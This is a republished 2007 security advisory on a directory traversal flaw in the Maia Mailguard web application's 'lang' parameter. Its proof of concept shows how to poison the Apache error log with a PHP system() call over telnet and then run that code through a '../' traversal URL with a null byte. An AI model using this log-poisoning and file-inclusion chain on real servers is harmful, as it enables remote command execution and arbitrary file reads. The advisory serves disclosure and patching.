Lucene search
K

Netragard Security Advisory 2007-06-28

🗓️ 07 Jul 2007 00:00:00Reported by Adriel T. DesautelsType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 35 Views

Directory Traversal in Maia Mailguard <= 1.0.2, Arbitrary Code Executio

Code
`  
*************************** NETRAGARD ADVISORY ************************  
http://www.netragard.com  
"We make IT Safe"  
[Advisory Summary]  
-----------------------------------------------------------------------  
Advisory Author : Adriel T. Desautels  
Advisory ID : NETRAGARD-20070628  
Product Name : Maia Mailguard  
Product Version : <= 1.0.2 (All Platforms)  
Vendor Name : http://www.miamailguard.com  
Type of Vulnerability : Directory Traversal / File Read  
Effort (1-10 where 1 == easy) : 2  
Impact : Arbitrary Code Execution  
Vendor Notified : Yes  
Patch Released : N/A  
Discovery Date : 06/10/2007  
  
[POSTING NOTICE]  
-----------------------------------------------------------------------  
If you intend to post this advisory on your web-site you must provide   
a clickable link back to http://www.netragard.com as the contents of   
this advisory may be updated without notice.   
  
[Product Description]  
-----------------------------------------------------------------------  
"Maia Mailguard is a web-based interface and management system based on  
the popular amavisd-new e-mail scanner and SpamAssassin. Written in Perl  
and PHP, Maia Mailguard gives end-users control over how their mail is  
processed by virus scanners and spam filters, while giving mail   
administrators the power to configure site-wide defaults and limits."  
  
-- http://www.miamailguard.com --  
  
[Technical Summary]  
-----------------------------------------------------------------------  
A Directory Traversal vulnerability exists in the Maia Mailguard Web   
Application that enables an attacker to execute arbitrary commands on  
the affected system.   
  
[Technical Details]  
-----------------------------------------------------------------------  
Improper input validation on the "lang" variable in Maia Mailguard web  
application has resulted in a Directory Traversal vulnerability that   
can be used to execute arbitrary commands on he affected system, or, to  
read arbitrary files on the affected system.  
  
[Proof Of Concept]  
-----------------------------------------------------------------------  
1-) An attacker can inject code into the httpd-error.log file by   
connecting to port 80 on the affected system and issuing a "get   
<CODE HERE>" command. See example below:  
  
the-wretched:~ simon$ telnet maiatest.snosoft.com 80  
Trying 10.0.0.128...  
Connected to maiatest.snosoft.com.  
Escape character is '^]'.  
  
get &ltpre>><?php system('ls -laf /var/log');?>   
  
HTTP/1.1 400 Bad Request  
Date: Wed, 20 Jun 2007 21:31:58 GMT  
Server: Apache/1.3.37 (Unix) PHP/5.2.1 with Suhosin-Patch mod_ssl/2.8.28 OpenSSL/0.9.7e-p1  
Connection: close  
Content-Type: text/html; charset=iso-8859-1  
  
2-) Once the attacker has injected his code into the log file, the code  
can be executed by forcing the web application to read the log file.  
When the log file is read, the code is executed. Below is an example  
of code execution:  
  
the-wretched:~ simon$ wget http://maiatest.snosoft.com/maia/login.php?lang=  
../../../../../../../../../../../../../var/log/httpd-error.log%00.txt  
  
[Vendor Status]  
-----------------------------------------------------------------------  
Vendor has been notified and has been very quick to respond to and  
patch this issue.  
  
[Vendor Comments]  
-----------------------------------------------------------------------  
"The only addition that I had was that it seems to only affect systems   
like freebsd... It would be nice to nail that down. It suspect the   
root security issue is really with the php and filesystem   
interaction... my patch just simply works around and blocks the root   
problem. From my developer point of view, I'm asking for one file   
and the filesystem is giving us something else. That's a serious   
risk. If we could at least express that concern, I think that would   
be prudent.  
  
Chicken and egg problem, I was kinda waiting on you to post our own   
ticket, but.... I can add a comment afterwards. OK.  
Here's our ticket which also references the changeset:  
  
http://www.maiamailguard.org/maia/ticket/479  
  
A unified patch may be retrieved from: http://www.maiamailguard.org/   
maia/changeset/1184?format=diff&new=1184  
  
David Morton"  
  
  
  
[Disclaimer]  
----------------------http://www.netragard.com-------------------------  
Netragard, L.L.C. assumes no liability for the use of the information  
provided in this advisory. This advisory was released in an effort to  
help the I.T. community protect themselves against a potentially  
dangerous security hole. This advisory is not an attempt to solicit  
business.  
  
<a href="http://www.netragard.com>  
http://www.netragard.com  
</a>  
  
  
  
  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation